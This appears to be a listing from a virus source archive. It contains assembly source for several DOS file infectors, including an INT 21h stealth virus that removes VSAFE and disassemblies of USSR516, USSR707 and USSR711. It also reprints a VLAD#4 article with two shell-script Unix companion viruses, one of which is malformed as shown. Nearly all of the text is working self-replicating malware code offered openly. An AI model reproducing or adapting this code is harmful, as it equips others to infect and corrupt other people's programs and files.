mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov cx,50 ;50 beep's!
beep: ;beep label!
mov ax,0E07h ;
int 10h ;print beep char
loop beep ;go!
NO_DAY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
action_dia Db 01fH ;day for the action
action_mes Db 0cH ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
MSDOS/U-Index/Virus.MSDOS.Unknown.unix.txt
+63
View File
@@ -0,0 +1,63 @@
Lame Unix Viruses
+---------------+
Well, you might have read the title to this article and thought, well
if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can
be answered quite simply, we had one free space! :) It was a bit of
a dilemma to begin with, we had four articles and one space. The problem
was they were all kinda lame. So it was a lame pick of the month episode.
Out of the four articles this was the leastest lamest. Well actually
I don't know about that, but anyway it was the most different one we
had sitting there. Just to prove the title, the author of these
masterpieces asked to remain anonymous to save his reputation.
These "viruses" are the equivalent of a DOS batch file infector because
they are written in shell language. They function similarly to companion
infectors by renaming the original file and replacing it with themselves.
Disinfection is simple by 'mv'ing (moving) the original files back.
Anyway, perhaps someone is interested so here they are. There isn't
much use for them except to annoy your friends when it messes up all
the files in their directory.
+-----------------------------------+
#!/bin/sh
# Dumb Unix Virus
# I dont wanna write anutha dumb unix virus qark, i wont
# Due to excess lameness, dont distribute
# <Author's name withheld for obvious reasons>
for files in *
do
if [ -x files ]
then
if [ ! -d files ]
then
mv files files.EVILVIRUS.HELPME
cp $0 files
chmod +x files
files.EVILVIRUS.HELPME
fi
fi
+-----------------------------------+
cat << _EOF >unix.virus
#!/bin/csh
# Dumber Unix Virus
# by
# SumUtherGuy
foreach i (*)
mv $i bak.$i
cp $0 $i
i >> $i
end
_EOF
+-----------------------------------+
MSDOS/U-Index/Virus.MSDOS.Unknown.ussr516.asm
+278
View File
@@ -0,0 +1,278 @@
ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
; This is where the virus really begins
start:
push ax
call beginvir
orig4 db 0cdh, 20h, 0, 0
int30store db 0, 0, 0, 0 ; Actually it's int 21h
; entry point
int21store db 0, 0, 0, 0
beginvir: pop bp ; BP -> orig4
mov si,bp
mov di,103h
add di,[di-2] ; DI -> orig4
movsw ; restore original
movsw ; 4 bytes of program
xor si,si
mov ds,si
les di,dword ptr ds:[21h*4]
mov [bp+8],di ; int21store
mov [bp+0Ah],es
lds di,dword ptr ds:[30h*4+1] ; Bug????
findmarker:
inc di
cmp word ptr [di-2],0E18Ah ; Find marker bytes
jne findmarker ; to the entry point
mov [bp+4],di ; and move to
mov [bp+6],ds ; int30store
mov ax,5252h ; Get list of lists
int 21h ; and also ID check
add bx,12h ; Already installed?
jz quitvir ; then exit
push bx
mov ah,30h ; Get DOS version
int 21h
pop bx ; bx = 12, ptr to 1st
; disk buffer
cmp al,3
je handlebuffer ; if DOS 3
ja handleDBHCH ; if > DOS 3
inc bx ; DOS 2.X, offset is 13
handlebuffer:
push ds
push bx
lds bx,dword ptr [bx] ; Get seg:off of buffer
inc si
pop di
pop es ; ES:DI->seg:off buff
mov ax,[bx] ; ptr to next buffer
cmp ax,0FFFFh ; least recently used?
jne handlebuffer ; if not, go find it
cmp si,3
jbe quitvir
stosw
stosw
jmp short movetobuffer
handleDBHCH: ; Disk Buffer Hash Chain Head array
lds si,dword ptr [bx] ; ptr to disk buffer
lodsw ; info
lodsw ; seg of disk buffer
; hash chain head array
inc ax ; second entry
mov ds,ax
xor bx,bx
mov si,bx
lodsw ; EMS page, -1 if not
; in EMS
xchg ax,di ; save in di
lodsw ; ptr to least recently
; used buffer
mov [di+2],ax ; change disk buffer
; backward offset to
; least recently used
xchg ax,di ; restore EMS page
mov [di],ax ; set to least recently
movetobuffer: ; used
mov di,bx
push ds
pop es ; ES:DI -> disk buffer
push cs
pop ds
mov cx,108h
lea si,[bp-4] ; Copy from start
rep movsw
mov ds,cx ; DS -> interrupt table
mov word ptr ds:[4*21h],0BCh ; New interrupt handler
mov word ptr ds:[4*21h+2],es ; at int21
quitvir:
push cs ; CS = DS = ES
pop es
push es
pop ds
pop ax
mov bx,ax
mov si, 100h ; set up stack for
push si ; the return to the
retn ; original program
int24:
mov al,3 ; Ignore all errors
iret
tickstore db 3 ; Why???
buffer db 3, 0, 9, 0
int21:
pushf
cli ; CP/M style call entry
call dword ptr cs:[int30store-start]
retn ; point of int 21h
int21DSDX: ; For int 21h calls
push ds ; with
lds dx,dword ptr [bp+2] ; DS:DX -> filename
call int21
pop ds
retn
cmp ax,4B00h ; Execute
je Execute
cmp ax,5252h ; ID check
je CheckID
cmp ah,30h ; DOS Version
je DosVersion
callorig21: ; Do other calls
jmp dword ptr cs:[int21store-start]
DosVersion: ; Why????? ; DOS Version
dec byte ptr cs:[tickstore-start]
jnz callorig21 ; Continue if not 0
push es
xor ax,ax
push ax
mov es,ax
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
; since midnight
and al,7 ; MOD 15
inc ax
inc ax
mov cs:[tickstore-start],al ; # 2-17
pop ax
pop es
iret
CheckID: ; ID Check
mov bx,0FFEEh ; FFEEh = -12h
iret
Execute: ; Execute
push ax ; Save registers
push cx
push es
push bx
push ds ; DS:DX -> filename
push dx ; save it on stack
push bp
mov bp,sp ; Set up stack frame
sub sp,0Ah ; Temporary variables
; [bp-A] = attributes
; [bp-8] = int 24 off
; [bp-6] = int 24 seg
; [bp-4] = file time
; [bp-2] = file date
sti
push cs
pop ds
mov ax,3301h ; Turn off ^C check
xor dl,dl ; (never turn it back
call int21 ; on. Bug???)
mov ax,3524h ; Get int 24h
call int21 ; (Critical error)
mov [bp-8],bx
mov [bp-6],es
mov dx,int24-start
mov ax,2524h ; Set to new one
call int21
mov ax,4300h ; Get attributes
call int21DSDX
jnc continue
doneinfect:
mov ax,2524h ; Restore crit error
lds dx,dword ptr [bp-8] ; handler
call int21
cli
mov sp,bp
pop bp
pop dx
pop ds
pop bx
pop es
pop cx
pop ax
jmp short callorig21 ; Call orig handler
continue:
mov [bp-0Ah],cx ; Save attributes
test cl,1 ; Check if r/o????
jz noclearattr
xor cx,cx
mov ax,4301h ; Clear attributes
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Quit on error
noclearattr:
mov ax,3D02h ; Open read/write
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Exit if error
mov bx,ax
mov ax,5700h ; Save time/date
call int21
mov [bp-4],cx
mov [bp-2],dx
mov dx,buffer-start
mov cx,4
mov ah,3Fh ; Read 4 bytes to
call int21 ; buffer
jc quitinf
cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
jne quitinf ; Otherwise, quit
mov dx,word ptr ds:[buffer+1-start]; dx = jmploc
dec dx
xor cx,cx
mov ax,4201h ; go there
call int21
mov ds:[buffer-start],ax ; new location offset
mov dx,orig4-start
mov cx,4
mov ah,3Fh ; Read 4 bytes there
call int21
mov dx,ds:[orig4-start]
cmp dl,0E9h ; 0E9h means we might
jne infect ; already be there
mov ax,ds:[orig4+2-start] ; continue checking
add al,dh ; to see if we really
sub al,ah ; are there.
jz quitinf
infect:
xor cx,cx
mov dx,cx
mov ax,4202h ; Go to EOF
call int21
mov ds:[buffer+2-start],ax ; save filesize
mov cx,204h
mov ah,40h ; Write virus
call int21
jc quitinf ; Exit if error
sub cx,ax
jnz quitinf
mov dx,ds:[buffer-start]
mov ax,ds:[buffer+2-start]
sub ax,dx
sub ax,3 ; AX->jmp offset
mov word ptr ds:[buffer+1-start],ax; Set up buffer
mov byte ptr ds:[buffer-start],0E9h; code the jmp
add al,ah
mov byte ptr ds:[buffer+3-start],al
mov ax,4200h ; Rewind to jmploc
call int21
mov dx, buffer-start
mov cx,4 ; Write in the jmp
mov ah,40h
call int21
quitinf:
mov cx,[bp-4]
mov dx,[bp-2]
mov ax,5701h ; Restore date/time
call int21
mov ah,3Eh ; Close file
call int21
mov cx,[bp-0Ah] ; Restore attributes
mov ax,4301h
call int21DSDX
jmp doneinfect ; Return
ussr516 ends
end stub
MSDOS/U-Index/Virus.MSDOS.Unknown.ussr707.asm
+408
View File
@@ -0,0 +1,408 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ USSR707 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 9-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_7e equ 413h
data_8e equ 1460h
data_9e equ 3
data_10e equ 2
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ussr707 proc far
start:
mov ax,offset loc_2
push ax
retn
loc_2:
jmp short loc_3
nop
ussr707 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
call sub_3
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
pop di
sub di,6
retn
sub_2 endp
db 60h, 14h, 2Bh, 02h, 2Eh, 3Ah
db 26h,0FFh, 0Dh, 00h,0A0h, 00h
db 50h,0C3h, 01h, 2Eh,0A3h,0C0h
db 00h, 9Ch, 00h, 00h, 90h, 90h
db 90h,0CDh
db 20h
loc_3:
call sub_2
mov ah,[di+21h]
mov byte ptr ds:[100h],ah
mov ax,[di+22h]
mov word ptr ds:[101h],ax
mov ax,[di+24h]
mov word ptr ds:[103h],ax
mov ah,30h ; '0'
int 21h ; DOS Services ah=function 30h
; get DOS version number ax
cmp ax,1E03h
je loc_4 ; Jump if equal
jmp loc_9
loc_4:
mov bl,0
mov ax,4BFFh
int 21h ; ??INT Non-standard interrupt
cmp bl,0FFh
jne loc_5 ; Jump if not equal
jmp loc_9
loc_5:
mov ax,ds:data_10e
mov [di+14h],ax
mov bx,di
add bx,0Fh
xor ax,ax ; Zero register
mov es,ax
loc_6:
xor si,si ; Zero register
mov ax,es
inc ax
cmp ax,0FFFh
jbe loc_7 ; Jump if below or =
jmp short loc_9
nop
loc_7:
mov es,ax
loc_8:
mov ah,es:data_8e[si]
cmp ah,[bx+si]
jne loc_6 ; Jump if not equal
inc si
cmp si,5
jne loc_8 ; Jump if not equal
mov [di+0Dh],es
mov word ptr [di+1Fh],0
mov ax,cs
dec ax
mov es,ax
call sub_7
sub si,di
mov ax,si
mov cl,4
shr ax,cl ; Shift w/zeros fill
inc ax
sub es:data_9e,ax
sub ds:data_10e,ax
mov bx,[di+14h]
sub bx,ax
mov es,bx
push di
call sub_4
xor cx,cx ; Zero register
mov ds,cx
mov cl,6
shr ax,cl ; Shift w/zeros fill
inc ax
sub ds:data_7e,ax
mov ax,ds:data_5e
mov cs:[bx+0Bh],ax
mov ax,ds:data_6e
mov cs:[bx+0Dh],ax
push cs
pop ds
mov cx,si
mov si,di
xor di,di ; Zero register
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop di
sub bx,di
add bx,2
xor ax,ax ; Zero register
mov ds,ax
cli ; Disable interrupts
mov ds:data_5e,bx
mov ds:data_6e,es
sti ; Enable interrupts
loc_9:
push cs
pop ds
push cs
pop es
mov ax,offset start
push ax
retn
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
call sub_5
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_5:
pop bx
retn
sub_4 endp
push bx
mov bh,4Bh ; 'K'
cmp bh,ah
je loc_11 ; Jump if equal
pop bx
loc_10:
;* jmp far ptr loc_1
db 0EAh, 93h, 17h, 26h, 0Dh
loc_11:
cmp al,0FFh
jne loc_12 ; Jump if not equal
pop bx
mov bl,0FFh
iret ; Interrupt return
pushf ; Push flags
;* call far ptr sub_1
db 9Ah, 00h, 00h, 00h, 00h
push ax
in al,61h ; port 61h, 8255 port B, read
xor al,3
out 61h,al ; port 61h, 8255 B - spkr, etc
mov al,0B6h
out 43h,al ; port 43h, 8253 wrt timr mode
mov ax,bx
out 42h,al ; port 42h, 8253 timer 2 spkr
mov al,ah
out 42h,al ; port 42h, 8253 timer 2 spkr
pop ax
iret ; Interrupt return
loc_12:
push ax
push cx
push dx
push di
push ds
push es
mov bx,dx
xor di,di ; Zero register
loc_13:
inc di
cmp byte ptr [bx+di],0
jne loc_13 ; Jump if not equal
cmp word ptr [bx+di-2],4D4Fh
je loc_14 ; Jump if equal
jmp loc_26
loc_14:
cmp byte ptr [bx+di-3],43h ; 'C'
je loc_15 ; Jump if equal
jmp loc_26
loc_15:
call sub_2
mov bx,di
add bx,1Ah
mov ax,70h
mov es,ax
xor di,di ; Zero register
loc_16:
inc di
cmp di,0FFFFh
jbe loc_17 ; Jump if below or =
jmp loc_26
loc_17:
xor si,si ; Zero register
loc_18:
mov ah,es:[di]
cmp ah,cs:[bx+si]
jne loc_16 ; Jump if not equal
inc si
inc di
cmp si,5
jne loc_18 ; Jump if not equal
sub di,5
xor ax,ax ; Zero register
mov es,ax
push word ptr es:data_3e
push word ptr es:data_4e
cli ; Disable interrupts
mov es:data_3e,di
mov word ptr es:data_4e,70h
sti ; Enable interrupts
call sub_2
mov bx,dx
xor cx,cx ; Zero register
mov ah,4Eh ; 'N'
call sub_6
jnc loc_19 ; Jump if carry=0
jmp loc_25
loc_19:
mov ah,2Fh ; '/'
call sub_6
mov ax,es:[bx+1Ah]
cmp ax,0F000h
jbe loc_20 ; Jump if below or =
jmp loc_25
loc_20:
push ds
push dx
push word ptr es:[bx+15h]
push word ptr es:[bx+16h]
push word ptr es:[bx+18h]
add ax,100h
mov cs:[di+18h],ax
mov ax,4301h
mov cx,20h
call sub_6
mov ax,3D02h
call sub_6
jnc loc_21 ; Jump if carry=0
jmp short loc_24
nop
loc_21:
push cs
pop ds
mov bx,ax
mov ah,3Fh ; '?'
mov cx,5
mov dx,di
add dx,21h
call sub_6
mov ax,[di+18h]
sub ax,[di+22h]
cmp ax,2C3h
jne loc_23 ; Jump if not equal
cmp byte ptr [di+20h],1Eh
jae loc_22 ; Jump if above or =
inc byte ptr [di+20h]
loc_22:
jmp short loc_24
nop
loc_23:
mov byte ptr [di+17h],0B8h
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_6
mov ah,40h ; '@'
mov cx,3
mov dx,di
add dx,17h
call sub_6
mov ah,40h ; '@'
mov cx,2
mov word ptr [di+17h],0C350h
call sub_6
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_6
mov ah,40h ; '@'
call sub_7
mov cx,si
sub cx,di
mov dx,di
call sub_6
loc_24:
mov ax,5701h
pop dx
pop cx
call sub_6
mov ax,4301h
pop cx
mov ch,0
pop dx
pop ds
call sub_6
mov ah,3Eh ; '>'
call sub_6
loc_25:
xor ax,ax ; Zero register
mov es,ax
cli ; Disable interrupts
pop word ptr es:data_4e
pop word ptr es:data_3e
sti ; Enable interrupts
loc_26:
call sub_2
cmp byte ptr cs:[di+1Fh],0
jne loc_27 ; Jump if not equal
cmp byte ptr cs:[di+20h],1Eh
jb loc_27 ; Jump if below
mov byte ptr cs:[di+1Fh],1
xor ax,ax ; Zero register
mov es,ax
call sub_4
add bx,17h
mov ax,es:data_1e
mov cx,es:data_2e
mov cs:[bx+2],ax
mov cs:[bx+4],cx
cli ; Disable interrupts
mov es:data_1e,bx
mov es:data_2e,cs
sti ; Enable interrupts
loc_27:
pop es
pop ds
pop di
pop dx
pop cx
pop ax
pop bx
jmp loc_10
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_6 proc near
pushf ; Push flags
call dword ptr cs:[di+0Bh]
retn
sub_6 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_7 proc near
call sub_8
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_8:
pop si
add si,5
retn
sub_7 endp
seg_a ends
end start
MSDOS/U-Index/Virus.MSDOS.Unknown.ussr711.asm
+384
View File
@@ -0,0 +1,384 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ USSR711 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 9-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_7e equ 0D9h
data_8e equ 0DBh
data_9e equ 122h
data_10e equ 124h
data_11e equ 13Ah
data_12e equ 13Ch
data_13e equ 441h
data_14e equ 3
data_15e equ 12h
data_16e equ 0
data_17e equ 0B0h
data_18e equ 0B2h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ussr711 proc far
start:
jmp loc_1
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
call sub_1
ussr711 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop bx
xor di,di ; Zero register
mov si,bx
sub si,3
mov ax,4B04h
int 21h ; ??INT Non-standard interrupt
cmp ax,44Bh
loc_1:
call sub_2
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_2:
pop bx
xor di,di ; Zero register
mov si,bx
sub si,3
mov ax,4B04h
int 21h ; ??INT Non-standard interrupt
cmp ax,44Bh
je $+7Dh ; Jump if equal
mov ax,es
dec ax
mov es,ax
mov ax,es:data_14e
sub ax,2Ch
mov es:data_14e,ax
sub word ptr es:data_15e,2Ch
nop
mov es,es:data_15e
mov cx,2BBh
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
cli ; Disable interrupts
xor ax,ax ; Zero register
mov ds,ax
mov cx,ds:data_5e
mov es:data_11e,cx
mov cx,ds:data_6e
mov es:data_12e,cx
mov word ptr ds:data_5e,126h
mov ds:data_6e,es
mov cx,ds:data_1e
mov es:data_7e,cx
mov cx,ds:data_2e
mov es:data_8e,cx
mov word ptr ds:data_1e,0B4h
mov ds:data_2e,es
mov cx,ds:data_3e
mov es:data_9e,cx
mov cx,ds:data_4e
mov es:data_10e,cx
mov word ptr ds:data_3e,0DDh
mov ds:data_4e,es
sti ; Enable interrupts
mov di,100h
mov si,bx
add si,2B3h
mov cx,3
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,cs
mov es,ax
mov ds,ax
xor ax,ax ; Zero register
mov si,ax
mov di,0
mov bx,offset start
jmp bx ; Register jump
add bl,[si]
db 67h, 6Fh, 50h, 2Eh,0A1h,0B2h
db 00h, 40h, 2Eh,0A3h,0B2h, 00h
db 2Eh,0A1h,0B0h, 00h, 3Dh, 00h
db 00h, 75h, 10h, 2Eh, 81h, 3Eh
db 0B2h, 00h, 74h, 37h, 75h, 07h
db 0B8h, 02h, 1Ch, 2Eh,0A3h,0B0h
db 00h
db 58h,0EAh, 0Ah, 01h, 49h,0D7h
db 2Eh, 83h, 3Eh,0B0h, 00h, 00h
db 74h, 3Ch, 80h,0FCh, 03h, 74h
db 05h, 80h,0FCh, 0Bh
db 75h, 32h
loc_3:
test dl,80h
js loc_4 ; Jump if sign=1
push ax
mov ax,cs:data_18e
and ax,3
pop ax
jnz loc_4 ; Jump if not zero
push bp
add [bp+si+7Dh],dh
push ax
mov ax,cs
mov ds,ax
mov ax,[bp+6]
push ax
popf ; Pop flags
stc ; Set carry flag
pushf ; Push flags
pop ax
mov [bp+6],ax
xor ax,ax ; Zero register
mov ds,ax
pop ax
mov ah,80h
mov ds:data_13e,ah
pop ds
pop bp
iret ; Interrupt return
loc_4:
;* jmp far ptr loc_20
sub_1 endp
db 0EAh, 49h, 01h, 08h,0D7h
cmp ax,4B04h
jne loc_5 ; Jump if not equal
mov ax,44Bh
iret ; Interrupt return
loc_5:
cmp ax,4B00h
je loc_7 ; Jump if equal
cmp ax,4B03h
je loc_7 ; Jump if equal
loc_6:
;* jmp far ptr loc_19
db 0EAh,0B5h, 02h, 46h,0D5h
loc_7:
push ax
push bx
push cx
push dx
push ds
push es
push si
push di
mov ax,ds
mov es,ax
cld ; Clear direction
mov al,0
mov di,dx
mov cx,0C8h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
jnz loc_8 ; Jump if not zero
std ; Set direction flag
mov al,2Eh ; '.'
mov cx,0Ah
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
loc_8:
jnz loc_11 ; Jump if not zero
inc di
inc di
mov al,[di]
and al,0DFh
cmp al,43h ; 'C'
jne loc_11 ; Jump if not equal
mov al,[di+1]
and al,0DFh
cmp al,4Fh ; 'O'
jne loc_11 ; Jump if not equal
mov al,[di+2]
and al,0DFh
cmp al,4Dh ; 'M'
jne loc_11 ; Jump if not equal
mov al,[di-2]
and al,0DFh
cmp al,44h ; 'D'
jne loc_9 ; Jump if not equal
mov al,[di-8]
and al,0DFh
cmp al,43h ; 'C'
je loc_11 ; Jump if equal
loc_9:
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get attrb cx, filename @ds:dx
mov word ptr cs:[2B4h],cx
mov cx,20h
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
jc loc_11 ; Jump if carry Set
mov word ptr cs:[2B0h],ds
mov word ptr cs:[2B2h],dx
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_11 ; Jump if carry Set
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
mov word ptr cs:[2ACh],cx
mov word ptr cs:[2AEh],dx
jmp short loc_12
nop
loc_10:
jmp loc_6
loc_11:
jmp loc_16
loc_12:
mov cx,3
mov ax,cs
mov ds,ax
mov es,ax
mov dx,2B6h
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
mov cx,0
mov dx,word ptr cs:[2B7h]
add dx,3
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,0Ah
mov dx,29Bh
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
cld ; Clear direction
mov cx,0Ah
mov si,29Bh
mov di,data_16e
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_15 ; Jump if zero
mov ax,4202h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
cmp ax,6A4h
jb loc_15 ; Jump if below
jmp short loc_14
nop
loc_13:
jmp short loc_10
loc_14:
mov cx,cs:data_18e
and cx,0Fh
add cx,5
mov ax,cs
mov ds,ax
xor dx,dx ; Zero register
mov ax,4000h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_15 ; Jump if carry Set
mov ax,4202h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
sub ax,3
mov word ptr cs:[2AAh],ax
xor dx,dx ; Zero register
mov ax,4000h
mov cx,2BBh
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jc loc_15 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
